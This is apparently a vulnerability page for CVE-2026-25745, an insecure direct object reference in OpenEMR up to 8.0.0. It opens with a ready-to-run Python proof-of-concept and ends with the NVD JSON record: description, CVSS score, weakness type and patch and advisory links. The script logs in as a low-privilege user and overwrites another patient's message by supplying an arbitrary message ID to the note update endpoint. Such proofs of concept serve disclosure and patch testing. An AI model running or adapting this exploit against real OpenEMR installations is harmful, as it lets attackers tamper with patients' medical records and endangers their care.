CVE-2026-25745

import requests import json # CVE-2026-25745 PoC - OpenEMR IDOR Vulnerability # Target: OpenEMR <= 8.0.0 # Vulnerability: Insecure Direct Object Reference in message/note update endpoint TARGET_URL = "http://target-openemr.local" # Replace with actual target LOGIN_URL = f"{TARGET_URL}/interface/main/main.php" MESSAGE_UPDATE_URL = f"{TARGET_URL}/interface/patient_file/summary/add_mailbox.php" # Authentication credentials USERNAME = "attacker_account" PASSWORD = "attacker_password" def login(session, username, password): """Authenticate to OpenEMR""" login_data = { "authToken": "", "authDomain": "", "username": username, "password": password, "redirect": "/interface/main/main.php", "auth": "standard" } response = session.post(LOGIN_URL, data=login_data) return response.status_code == 200 def exploit_idor(session, target_message_id, malicious_content): """ Exploit the IDOR vulnerability by updating another patient's message Args: session: Authenticated requests session target_message_id: ID of the target patient's message to modify malicious_content: New content to inject Returns: Response from the server """ # Malicious request - no validation of message ownership update_data = { "form_id": target_message_id, # Arbitrary message ID from other patient "form_note": malicious_content, "form_activity": "1", "mode": "save" } headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } response = session.post(MESSAGE_UPDATE_URL, data=update_data, headers=headers) return response def main(): session = requests.Session() # Step 1: Login with low-privilege account print("[*] Logging in to OpenEMR...") if not login(session, USERNAME, PASSWORD): print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Exploit IDOR - modify another patient's message # Target message ID can be enumerated or guessed target_msg_id = 12345 # Replace with actual target message ID injected_content = "MALICIOUS_MODIFIED_CONTENT" print(f"[*] Attempting to modify message ID: {target_msg_id}") response = exploit_idor(session, target_msg_id, injected_content) if response.status_code == 200: print("[+] IDOR exploit successful - message modified without ownership check") else: print(f"[-] Exploit failed with status: {response.status_code}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-25745", "sourceIdentifier": "[email protected]", "published": "2026-03-18T21:16:25.043", "lastModified": "2026-03-20T19:16:13.617", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. In versions up to and including 8.0.0, the message/note update endpoint (e.g. PUT or POST) updates by message/note ID only and does not verify that the message belongs to the current patient (or that the user is allowed to edit that patient’s notes). An authenticated user with notes permission can modify any patient’s messages by supplying another message ID. Commit 92a2ff9eaaa80674b3a934a6556e35e7aded5a41 contains a fix for the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación gratuita y de código abierto de registros de salud electrónicos y gestión de consultorios médicos. En versiones hasta la 8.0.0 inclusive, el punto final de actualización de mensajes/notas (por ejemplo, PUT o POST) actualiza solo por ID de mensaje/nota y no verifica que el mensaje pertenezca al paciente actual (o que el usuario tiene permiso para editar las notas de ese paciente). Un usuario autenticado con permiso de notas puede modificar los mensajes de cualquier paciente al proporcionar otro ID de mensaje. El commit 92a2ff9eaaa80674b3a934a6556e35e7aded5a41 contiene una solución para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.0.0", "matchCriteriaId": "1D995E4F-C6E0-47AC-9F5A-4E828BA9A292"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/92a2ff9eaaa80674b3a934a6556e35e7aded5a41", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-jm78-x5p7-52qh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-jm78-x5p7-52qh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}